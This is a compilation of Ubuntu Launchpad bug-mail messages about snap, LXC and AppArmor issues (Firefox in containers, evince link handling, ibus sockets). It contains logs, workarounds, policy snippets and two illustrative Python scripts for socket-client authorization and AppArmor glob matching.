[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
I also see this on a 20.04 host with a 20.04 container.

$ lxc version
Client version: 5.0.2
Server version: 5.0.2
$ lxc launch ubuntu:20.04 foo
$ lxc stop foo
$ lxc config set foo security.nesting true
$ lxc start foo
$ lxc shell foo
root@foo:~# snap install firefox
error: cannot perform the following tasks:
- Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell":
-
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gtk-doc /usr/share/gtk-doc none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot open directory "/var/lib": permission denied
update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/xubuntu-docs /usr/share/xubuntu-docs none bind,ro 0 0): cannot open directory "/var/lib": permission denied
error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed.
See 'journalctl -xe' for details.
-)

No AppArmor denials on the host or within the container.

root@foo:~# journalctl -xe | cat
Mar 28 14:26:26 foo snapd[196]: -
Mar 28 14:26:26 foo systemd[1]: snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit snap.firefox.hook.connect-plug-host-hunspell.a7817955-d538-4a15-ae4e-1f7f00c4d00d.scope has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[370]: run-snapd-ns-firefox.mnt.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit UNIT has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: run-snapd-ns-firefox.mnt.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit run-snapd-ns-firefox.mnt.mount has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[370]: snap-firefox-2487.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit UNIT has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: snap-firefox-2487.mount: Succeeded.
-- Subject: Unit succeeded
-- Defined-By: systemd
-- Support: http://www.ubuntu.com/support
--
-- The unit snap-firefox-2487.mount has successfully entered the 'dead' state.
Mar 28 14:26:28 foo systemd[1]: Reloading.
Mar 28 14:26:28 foo systemd[1]: Cannot find unit for notify message of PID 1318, ignoring.
Mar 28 14:26:29 foo snapd[196]: handlers.go:662: Reported install problem for "firefox" as Crash report successfully submitted.

-- 
You received this bug notification because you are a member of Desktop Packages, which is subscribed to firefox in Ubuntu.
https://bugs.launchpad.net/bugs/1994453

Title:
  Firefox Snap cannot be installed in an LXC Container

Status in lxd:
  New
Status in snapd:
  New
Status in firefox package in Ubuntu:
  Confirmed
[Desktop-packages] [Bug 1994453] Re: Firefox Snap cannot be installed in an LXC Container
** Also affects: snapd
   Importance: Undecided
       Status: New

** Also affects: lxd
   Importance: Undecided
       Status: New

https://bugs.launchpad.net/bugs/1994453

Title:
  Firefox Snap cannot be installed in an LXC Container

Status in lxd:
  New
Status in snapd:
  New
Status in firefox package in Ubuntu:
  Confirmed

Bug description:
  $ sudo snap install firefox
  error: cannot perform the following tasks:
  - Run hook connect-plug-host-hunspell of snap "firefox" (run hook "connect-plug-host-hunspell":
  -
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/cups/doc-root /usr/share/cups/doc-root none bind,ro 0 0): cannot create directory "/usr/share/cups/doc-root": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/gimp/2.0/help /usr/share/gimp/2.0/help none bind,ro 0 0): cannot create directory "/usr/share/gimp/2.0": permission denied
  update.go:85: cannot change mount namespace according to change mount (/var/lib/snapd/hostfs/usr/share/libreoffice/help /usr/share/libreoffice/help none bind,ro 0 0): cannot create directory "/usr/share/libreoffice/help": permission denied
  error: error running snapctl: cannot start mount unit: systemctl command [start var-snap-firefox-common-host\x2dhunspell.mount] failed with exit status 1: A dependency job for var-snap-firefox-common-host\x2dhunspell.mount failed.
  See 'journalctl -xe' for details.
  -)

  This makes it very difficult to have LXC containers with a GUI (used via VNC), as a web browser is essential.

  Workaround:
  - Add the Mozillateam PPA (https://ppa.launchpadcontent.net/mozillateam/ppa/ubuntu)
  - Create /etc/apt/preferences.d/mozilla-firefox with:
      Package: firefox*
      Pin: release o=LP-PPA-mozillateam
      Pin-Priority: 1001
  - sudo apt install firefox

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: firefox 1:1snap1-0ubuntu2
  ProcVersionSignature: Ubuntu 5.15.0-48.54-generic 5.15.53
  Uname: Linux 5.15.0-48-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu82.1
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: KDE
  Date: Wed Oct 26 14:16:04 2022
  InstallationDate: Installed on 2020-11-02 (722 days ago)
  InstallationMedia: Ubuntu-Server 18.04.4 LTS "Bionic Beaver" - Release amd64 (20200203.1)
  Snap.Changes: no changes found
  SourcePackage: firefox
  UpgradeStatus: Upgraded to jammy on 2022-10-03 (22 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/lxd/+bug/1994453/+subscriptions

-- 
Mailing list: https://launchpad.net/~desktop-packages
Post to     : desktop-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~desktop-packages
More help   : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1968498] [NEW] Unhandled promise rejection after screenlock/unlock
Public bug reported:

After upgrading from focal to jammy, I noticed this in my logs:

Apr 10 14:05:40 host ubuntu-appindicat...@ubuntu.com[124051]: unable to update icon for software-update-available
Apr 10 14:05:40 host gnome-shell[124051]: Unhandled promise rejection. To suppress this warning, add an error handler to your promise chain with .catch() or a try-catch block around your await expression. Stack trace of the failed promise:
_checkNeededProperties@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:133:33
_nameOwnerChanged@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/appIndicator.js:154:18
_emit@resource:///org/gnome/gjs/modules/core/_signals.js:114:47
AppIndicatorsNameWatcher/this._watcherId<@/usr/share/gnome-shell/extensions/ubuntu-appindicat...@ubuntu.com/util.js:205:22

This happens after screenlock/unlock. It looks like https://github.com/ubuntu/gnome-shell-extension-appindicator/issues/334 was filed for this as well.

** Affects: gnome-shell-extension-appindicator (Ubuntu)
     Importance: Undecided
         Status: New

https://bugs.launchpad.net/bugs/1968498

Title:
  Unhandled promise rejection after screenlock/unlock

Status in gnome-shell-extension-appindicator package in Ubuntu:
  New
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
Olivier, yes, I shouldn't be assigned.

Ian, you're right the profile is suboptimal (it's also old so likely needs updating). Do note that this is a separate named profile and evince (and if this is put in an abstraction, anything that uses the abstraction) only has the `/{,snap/core/[0-9]*/}usr/bin/snap mrCx -> snap_browser,` rule which means that it is able to run the 'snap' command (needed since everything in /snap/bin points to /usr/bin/snap) which at the time I wrote the profile meant that access to this socket was needed as part of snap run. IIRC, snapd should be protecting certain actions by uid connecting to it (eg, you are root or not), but it has been a while since I've looked at that. Evince is not a snap though so if snapd does any checks on 'is the client a snap' then those would fail and evince would be able to do whatever a non-root user could do with the 'snap' command via the socket.

For snap run, we can see that the snap_browser profile limits what can be used with 'run' since (at the time I wrote the comment) 'snap run' required being able to look at the meta/snap.yaml of the specific snap. This 'works' (worked?) but is brittle since if snap run changed to lift this requirement (eg, 'snap run' just passed the name of the unresolved symlink to snapd over the socket and let snapd start the snap, perhaps via userd, etc) then this falls apart. The profile was put up as an example of what could be done at the time without any help from snapd. I never particularly cared for it cause it was brittle and not designed.

I'm not sure how to fix this, but here are some thoughts:

* evince is just executing stuff from /snap/bin (probably via the system's xdg-open). Assuming xdg-open, the system's xdg-open (or whatever evince is using to decide and launch the default browser) could itself be fixed in Ubuntu to launch a different command that behaved better. This wouldn't necessarily fix other distros (though this is the evince profile in Debian and Ubuntu, so *technically*, if you got this change (to presumably xdg-open) into them, you could update the evince profile in them accordingly)

* In lieu of that, if the profile still worked as intended, snapd could be hardened to look to check more than if the connecting process is root or a snap; it could also see if it is running under a non-snap profile, then limit access to the socket API accordingly. This has drawbacks and could break people who have written custom profiles similar to what I presented.

* I suppose an alternative approach would be to have symlinks in /snap/bin for things that are registered as browsers (or just the default browser) point to a designed snap command. Eg:

    /snap/bin/firefox -> /usr/bin/snap                          # keep the existing one too
    /snap/bin/default-browser-is-a-snap -> /usr/bin/snap-browser  # name is illustrative, TBD

  Now firefox, chromium, opera, brave, etc snaps register themselves as being capable of being a default browser with snapd, then snapd registers with the system that /snap/bin/default-browser-is-a-snap is the default browser (so system utilities like xdg-open don't need to change) and /usr/bin/snap-browser is written to be safe (eg, only able to 'snap run' the configured default browser, nothing else) and apparmor profiles are adjusted to have `/{,snap/core/[0-9]*/}usr/bin/snap-browser Uxr,` (or similar).

  The /snap/bin/default-browser-is-a-snap path is illustrative and there isn't really a need for it at all. Could simply perhaps have snapd register /usr/bin/snap-browser as the default browser on the system (it now needs to know what snapd configured as the default browser snap though) and forego the symlink.
https://bugs.launchpad.net/bugs/1794064

Title:
  Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in apparmor package in Ubuntu:
  Confirmed
Status in evince package in Ubuntu:
  Triaged
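Jamie's second bullet above (snapd looking at more than "is the peer root?" and "is the peer a snap?", and also noticing a peer that runs under some other, non-snap AppArmor profile such as /usr/bin/evince) can be made concrete. The following is an added illustration written for this thread, not snapd code: it takes the peer's pid and uid from the socket with SO_PEERCRED (kernel-supplied, so a client cannot forge it), reads that pid's AppArmor label from /proc, and applies a small policy table. The action names ("install", "info", "run:<snap>"), the policy itself and the default_browser parameter are assumptions of the example, standing in for whatever a dedicated snap-browser helper would be allowed to do. On a machine without AppArmor the label reads as "unconfined".

```python
"""Classify a Unix-socket client by uid and AppArmor label before granting API access.

Added illustration for this bug thread, not snapd code.  The action names, the
policy table and the default_browser parameter are assumptions of the example.
"""
import socket
import struct
from typing import Optional, Tuple


def peer_credentials(conn: socket.socket) -> Tuple[int, int, int]:
    """(pid, uid, gid) of the peer of a connected AF_UNIX socket (Linux SO_PEERCRED).

    The kernel fills this in; unlike anything in the request body the client
    cannot choose these values.
    """
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    pid, uid, gid = struct.unpack("3i", raw)
    return pid, uid, gid


def read_apparmor_label(pid: int) -> str:
    """Read the peer's AppArmor label, or 'unconfined' when AppArmor is not active.

    The kernel reports either "unconfined" or "<profile> (<mode>)", e.g.
    "snap.firefox.firefox (enforce)" or "/usr/bin/evince (enforce)".
    """
    for path in (f"/proc/{pid}/attr/apparmor/current", f"/proc/{pid}/attr/current"):
        try:
            with open(path, "rb") as fh:
                return fh.read().decode("utf-8", "replace").strip("\n\0")
        except OSError:
            continue
    return "unconfined"


def profile_name(label: str) -> str:
    """Strip the " (enforce)" / " (complain)" mode suffix from a label."""
    return label.split(" (", 1)[0]


def classify_label(label: str) -> str:
    """Bucket a label as 'unconfined', 'snap' or 'other-confined'."""
    name = profile_name(label)
    if name == "unconfined":
        return "unconfined"
    if name.startswith("snap."):
        return "snap"
    return "other-confined"


def snap_name(label: str) -> Optional[str]:
    """'snap.firefox.firefox (enforce)' -> 'firefox'; None for non-snap labels."""
    if classify_label(label) != "snap":
        return None
    return profile_name(label).split(".")[1]


def is_allowed(uid: int, label: str, action: str, default_browser: str) -> bool:
    """Hypothetical per-client policy for a socket API (not snapd's real rules).

    action is "install", "remove", "info" or "run:<snap>".
      root                       -> everything
      unconfined non-root user   -> anything but install/remove
      a snap                     -> query, or run itself
      any other confined program -> run the configured default browser only
    """
    if uid == 0:
        return True
    kind = classify_label(label)
    target = action.split(":", 1)[1] if action.startswith("run:") else None
    if kind == "unconfined":
        return action not in ("install", "remove")
    if kind == "snap":
        return action == "info" or target == snap_name(label)
    return target is not None and target == default_browser


def authorize(conn: socket.socket, action: str, default_browser: str = "firefox") -> bool:
    """End-to-end check for one connected client."""
    pid, uid, _gid = peer_credentials(conn)
    return is_allowed(uid, read_apparmor_label(pid), action, default_browser)


if __name__ == "__main__":
    # Stand-alone demo: with a socketpair this process is its own peer, so the
    # "server" end sees our own uid and AppArmor label (Linux only).
    server, client = socket.socketpair()
    pid, uid, _ = peer_credentials(server)
    label = read_apparmor_label(pid)
    print(f"peer pid={pid} uid={uid} label={label!r} -> {classify_label(label)}")
    print("run:firefox allowed:", authorize(server, "run:firefox"))
    client.close()
    server.close()
```

The point of the "other-confined" bucket is exactly the evince case in this bug: a confined, non-snap client gets a narrower API than an unconfined user, so a brittle `snap_browser`-style profile no longer has to do all the limiting on its own.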
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu)
     Assignee: Jamie Strandboge (jdstrand) => (unassigned)

https://bugs.launchpad.net/bugs/1794064

Title:
  Clicking a hyperlink in a PDF fails to open it if the default browser is a snap

Status in apparmor package in Ubuntu:
  Confirmed
Status in evince package in Ubuntu:
  Triaged

Bug description:
  This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap).

  This is not a recent regression, it's not working on bionic either.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.10
  Package: evince 3.30.0-2
  ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5
  Uname: Linux 4.18.0-7-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.10-0ubuntu11
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Sep 24 12:28:06 2018
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2016-07-02 (813 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  SourcePackage: evince
  UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago)
  modified.conffile..etc.apparmor.d.abstractions.evince: [modified]
  mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158
[Desktop-packages] [Bug 1897369] Re: apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)
Till, it allows quite a few things (from man capabilities):

CAP_SYS_NICE
  * Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes;
  * set real-time scheduling policies for calling process, and set scheduling policies and priorities for arbitrary processes (sched_setscheduler(2), sched_setparam(2), sched_setattr(2));
  * set CPU affinity for arbitrary processes (sched_setaffinity(2));
  * set I/O scheduling class and priority for arbitrary processes (ioprio_set(2));
  * apply migrate_pages(2) to arbitrary processes and allow processes to be migrated to arbitrary nodes;
  * apply move_pages(2) to arbitrary processes;
  * use the MPOL_MF_MOVE_ALL flag with mbind(2) and move_pages(2).

cups-browsed is probably just trying to renice itself, which isn't terrible for it to try, but it probably fails gracefully with this just being noise. If it does fail gracefully, you could consider an explicit deny rule to silence the log. Eg:

  deny capability sys_nice,

That said, we've normally allowed system policy (ie, those shipped in debs) to use sys_nice if they have a legitimate use case for it.

https://bugs.launchpad.net/bugs/1897369

Title:
  apparmor: Allow cups-browsed to change nice value (CAP_SYS_NICE)

Status in cups package in Ubuntu:
  Confirmed

Bug description:
  In Ubuntu 20.04.1 with *cups-browsed* 1.27.4-1, apparmor prevents `/usr/sbin/cups-browsed` from changing its nice value.

  $ sudo dmesg | grep apparmor
  [541870.509461] audit: type=1400 audit(1600898428.089:60): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=62030 comm="cups-browsed" capability=23 capname="sys_nice"
  [628298.779668] audit: type=1400 audit(1600984854.115:61): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=66850 comm="cups-browsed" capability=23 capname="sys_nice"
  [714667.424963] audit: type=1400 audit(1601071220.527:62): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=76828 comm="cups-browsed" capability=23 capname="sys_nice"
[Desktop-packages] [Bug 1871148] Re: services start before apparmor profiles are loaded
This was fixed in snapd in 2.44 via https://github.com/snapcore/snapd/pull/8467

** Changed in: snapd (Ubuntu)
       Status: In Progress => Fix Released

** Changed in: snapd (Ubuntu Focal)
       Status: In Progress => Fix Released

https://bugs.launchpad.net/bugs/1871148

Title:
  services start before apparmor profiles are loaded

Status in AppArmor:
  Invalid
Status in snapd:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in snapd package in Ubuntu:
  Fix Released
Status in zsys package in Ubuntu:
  Invalid
Status in apparmor source package in Focal:
  Fix Released
Status in snapd source package in Focal:
  Fix Released
Status in zsys source package in Focal:
  Invalid

Bug description:
  Per discussion with Zyga in #snapd on Freenode, I have hit a race condition where services are being started by the system before apparmor has been started. I have a complete log of my system showing the effect somewhere within at https://paste.ubuntu.com/p/Jyx6gfFc3q/.

  Restarting apparmor using `sudo systemctl restart apparmor` is enough to bring installed snaps back to full functionality. Previously, when running any snap I would receive the following in the terminal:

  ---
  cannot change profile for the next exec call: No such file or directory
  snap-update-ns failed with code 1: File exists
  ---

  Updated to add for Jamie:

  $ snap version
  snap    2.44.2+20.04
  snapd   2.44.2+20.04
  series  16
  ubuntu  20.04
  kernel  5.4.0-21-generic
[Desktop-packages] [Bug 1891338] Re: apparmor misconfigured for envice
You are right that there are two places this is defined: in /etc/apparmor.d/abstractions/ubuntu-browsers.d/ubuntu-integration and in /etc/apparmor.d/usr.bin.evince.

I'll adjust apparmor to fix ubuntu-integration to use the exo-open abstraction. There is an evince task though because we don't want it to use the ubuntu-integration abstraction. Instead the exo-open stanza in the usr.bin.evince should just include the exo-open abstraction. Ie, replace this:

  # For Xubuntu to launch the browser
  /usr/bin/exo-open ixr,
  /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr,
  /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r,
  /etc/xdg/xfce4/helpers.rc r,

with this:

  # For Xubuntu to launch the browser
  #include

** Also affects: evince (Ubuntu)
   Importance: Undecided
       Status: New

** Changed in: apparmor (Ubuntu)
       Status: New => In Progress

** Changed in: evince (Ubuntu)
       Status: New => Triaged

https://bugs.launchpad.net/bugs/1891338

Title:
  apparmor misconfigured for envice

Status in apparmor package in Ubuntu:
  In Progress
Status in evince package in Ubuntu:
  Triaged

Bug description:
  On a fully up to date xubuntu 20-04 system, when I run evince and click on a link, it fails to follow that link in my browser. This kind of thing happens when you are reading a technical paper and want to follow one of the references and click on the doi or url.

  When I click on the link I get a box that I cannot copy from that says:

    Failed to launch preferred application for category "WebBrowser".
    Failed to execute child process "/usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2" (Permission denied).

  Did I say that it is annoying that I could not copy the text in this box!!

  The output of the ldd command you asked for is attached.

  I should also point out that this worked fine under xubuntu 18.04.

  I had originally posted this as an additional comment on https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1869159?comments=all but https://launchpad.net/~seb128 said that I should submit this as a separate bug because this is likely an apparmor configuration problem that is similar to the ancient bug https://bugs.launchpad.net/bugs/987578.
[Desktop-packages] [Bug 1580463] Re: Snap blocks access to system input methods (ibus, fcitx, ...)
I agree that a new bug should be filed. When doing so, please attach any relevant policy violations from journalctl to the bug.

https://bugs.launchpad.net/bugs/1580463

Title:
  Snap blocks access to system input methods (ibus, fcitx, ...)

Status in ibus:
  Fix Released
Status in apparmor package in Ubuntu:
  Fix Released
Status in ibus package in Ubuntu:
  Fix Released
Status in im-config package in Ubuntu:
  Fix Released
Status in snapd package in Ubuntu:
  Fix Released
Status in apparmor source package in Xenial:
  Fix Released
Status in im-config source package in Xenial:
  Fix Released
Status in snapd source package in Xenial:
  Fix Released
Status in apparmor source package in Yakkety:
  Fix Released
Status in im-config source package in Yakkety:
  Fix Released
Status in snapd source package in Yakkety:
  Fix Released

Bug description:
  = SRU im-config =

  [Impact]

  ibus-daemon by default uses a unix socket name of /tmp/dbus-... that is indistinguishable from dbus-daemon abstract sockets. While dbus-daemon has AppArmor mediation, ibus-daemon does not so it is important that its abstract socket not be confused with dbus-daemon's. By modifying ibus-daemon's start arguments to use "--address 'unix:tmpdir=/tmp/ibus'" AppArmor can continue mediating DBus abstract sockets like normal and also mediate access to the ibus-daemon-specific abstract socket via unix rules. This also tidies up the abstract socket paths so that it is clear which are for ibus-daemon, which for dbus-daemon, etc.

  The upload simply adjusts 21_ibus.rc to start ibus-daemon with "--address 'unix:tmpdir=/tmp/ibus'" and adds a comment. No compiled code changes are required.

  [Test Case]

  1. start a unity session before updating to the package in -proposed
  2. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76
  3. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 2973 jamie 8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM
  4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before
  5. logout of unity, then log back in
  6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0
     IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e
     (notice '/tmp/ibus/' in the path)
  7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus'
     ibus-daem 3471 jamie 8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM
     ...
     (notice '@/tmp/ibus/' in the path)

  In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources.

  Extended test case to verify input support still works in unconfined and confined applications:

  1. Systems Settings Language Support, if prompted install the complete language support
  2. Install Chinese (simple and traditional)
  3. sudo apt-get install ibus-pinyin ibus-sunpinyin
  4. logout / login
  5. System Settings / Text Entry - add Chinese (Pinyin) (IBus)
  6. select pinyin from the indicator
  7. sudo lsof | grep ibus | grep @    # will use @/tmp/dbus-...
  8. open gnome-calculator and try to type something in (should get a pop-up)
  9. open evince and try to search a pdf (should get a pop up)
  10. upgrade apparmor and im-config from xenial-proposed
  11. logout and back in
  12. sudo lsof | grep ibus | grep @   # will use @/tmp/ibus/...
  13. open gnome-calculator and try to type something in (should get a pop-up)
  14. open evince and try to search a pdf (should get a pop up)
  15. verify no new apparmor denials

  [Regression Potential]

  The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus-daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up.

  This change intentionally requires a change to the unity7 snapd interface, which is already done.

  This change intentionally requires a change to apparmor to add a unix rule for communicating with the new ibus address. This is in xenial-proposed 2.10.95-0ubuntu2.3 (and 2.10.95-0ubuntu2.4). The package changes to im-config use 'Breaks: apparmor (<< 2.10.95-0ubuntu2.3)' to ensure that the apparmor abstraction is updated and policy recompiled before ibus is restarted. This was omitted from the initial im-config upload which resulted in bug #1588197. Test cases ensuring this is working p
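The [Impact] section above rests on one property of AppArmor unix rules: a peer=(addr=...) pattern is matched with AppArmor's path-glob semantics, so "@/tmp/dbus-*" necessarily covers both dbus-daemon's and ibus-daemon's old abstract sockets, while "@/tmp/ibus/dbus-*" covers only ibus. The script below is an added example written for this thread, not code from im-config, ibus or apparmor. It parses the IBUS_ADDRESS lines from the test case (D-Bus server addresses of the form transport:key=value,...), and matches the resulting abstract socket name against rule patterns using AppArmor's rules that '*' stops at '/', '**' does not, and '?' is one non-'/' character; {a,b} alternation and [] classes are not implemented. The dbus-daemon session address is constructed for the comparison.

```python
"""Which AppArmor unix peer_addr patterns does a D-Bus/ibus abstract socket fall under?

Added example for this bug thread; not from im-config, ibus or apparmor.
Glob support is limited to '*', '**' and '?'.
"""
import re
from typing import Dict, List

# Copied from the [Test Case] section above (before and after the change)
OLD_IBUS_ADDRESS = "IBUS_ADDRESS=unix:abstract=/tmp/dbus-Vyx8fGFA,guid=28e8e7e89f902c8d4e9d77c5557add76"
NEW_IBUS_ADDRESS = "IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e"
# Constructed: a dbus-daemon session bus address, which has the same /tmp/dbus-* shape
DBUS_SESSION_ADDRESS = "unix:abstract=/tmp/dbus-Ab12Cd34Ef,guid=0123456789abcdef0123456789abcdef"


def parse_dbus_address(addr: str) -> Dict[str, str]:
    """Parse one D-Bus server address 'transport:key=value,key=value' into a dict."""
    if addr.startswith("IBUS_ADDRESS="):
        addr = addr[len("IBUS_ADDRESS="):]
    transport, sep, rest = addr.partition(":")
    if not sep:
        raise ValueError(f"not a D-Bus address: {addr!r}")
    fields = {"transport": transport}
    for item in filter(None, rest.split(",")):
        key, _, value = item.partition("=")
        fields[key] = value
    return fields


def abstract_socket_name(addr: str) -> str:
    """Return the socket name as AppArmor writes it: '@' followed by the abstract name."""
    fields = parse_dbus_address(addr)
    if fields.get("transport") != "unix" or "abstract" not in fields:
        raise ValueError(f"not an abstract unix socket address: {addr!r}")
    return "@" + fields["abstract"]


def apparmor_glob_to_regex(pattern: str) -> "re.Pattern[str]":
    """Translate an AppArmor path glob into an anchored regular expression."""
    out = []
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "*":
            if pattern.startswith("**", i):
                out.append(".*")        # '**' may cross directory separators
                i += 2
                continue
            out.append("[^/]*")         # '*' stops at the next '/'
        elif ch == "?":
            out.append("[^/]")          # exactly one character, not '/'
        else:
            out.append(re.escape(ch))
        i += 1
    return re.compile("^" + "".join(out) + "$")


def peer_addr_matches(rule_addr: str, socket_name: str) -> bool:
    """Would a unix rule with peer=(addr=rule_addr) match socket_name?"""
    return apparmor_glob_to_regex(rule_addr).match(socket_name) is not None


def rules_matching(socket_name: str, rule_addrs: List[str]) -> List[str]:
    """The subset of peer_addr patterns that cover this socket."""
    return [r for r in rule_addrs if peer_addr_matches(r, socket_name)]


if __name__ == "__main__":
    dbus_rule = "@/tmp/dbus-*"        # what a profile needs for dbus-daemon anyway
    ibus_rule = "@/tmp/ibus/dbus-*"   # the new, ibus-only pattern
    for label, addr in (("dbus-daemon", DBUS_SESSION_ADDRESS),
                        ("old ibus", OLD_IBUS_ADDRESS),
                        ("new ibus", NEW_IBUS_ADDRESS)):
        name = abstract_socket_name(addr)
        print(f"{label:12} {name:28} matched by {rules_matching(name, [dbus_rule, ibus_rule])}")
```

Run stand-alone, the old ibus socket and the constructed dbus-daemon socket are both matched by "@/tmp/dbus-*" and are therefore indistinguishable to policy, while the new socket is matched only by "@/tmp/ibus/dbus-*".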
[Desktop-packages] [Bug 1881294] Re: Apparmor blocks evince GUI-Input-Dialogs
*** This bug is a duplicate of bug 1856738 ***
    https://bugs.launchpad.net/bugs/1856738

@Reinhard, you are now hitting bug #1856738 which prevents @{HOME} from being used in the peer_addr for an abstract socket. For now, I suggest updating /etc/apparmor.d/abstractions/ibus to have:

  unix (connect, receive, send) type=stream peer=(addr="@/home/teachers/*/.cache/ibus/dbus-*"),

** This bug has been marked a duplicate of bug 1856738
   access always denied when using @{HOME} tunable in peer_addr for abstract socket

https://bugs.launchpad.net/bugs/1881294

Title:
  Apparmor blocks evince GUI-Input-Dialogs

Status in evince package in Ubuntu:
  Invalid

Bug description:
  Network Users (LDAP + NFS4 home) cannot interact with evince GUI-input-elements.
  * page navigation per number not possible
  * select pages to print not possible
  * save open PDF with different name not possible

  Local user on the same machine behaves as expected.

  apparmor messages in /var/log/syslog

  May 29 14:37:07 r002pc51 kernel: [15848.736916] audit: type=1400 audit(1590755827.768:827): apparmor="DENIED" operation="file_lock" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.cache/event-sound-cache.tdb.2176809057334199ab75052753e0683a.x86_64-pc-linux-gnu" pid=34988 comm="evince" requested_mask="k" denied_mask="k" fsuid=4515 ouid=4515
  May 29 14:37:07 r002pc51 kernel: [15848.739259] audit: type=1400 audit(1590755827.772:828): apparmor="DENIED" operation="link" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.local/share/gvfs-metadata/.open04eaJ8" pid=34988 comm="pool-evince" requested_mask="l" denied_mask="l" fsuid=4515 ouid=4515 target="/home/teachers/ttfinr/.local/share/gvfs-metadata/home"
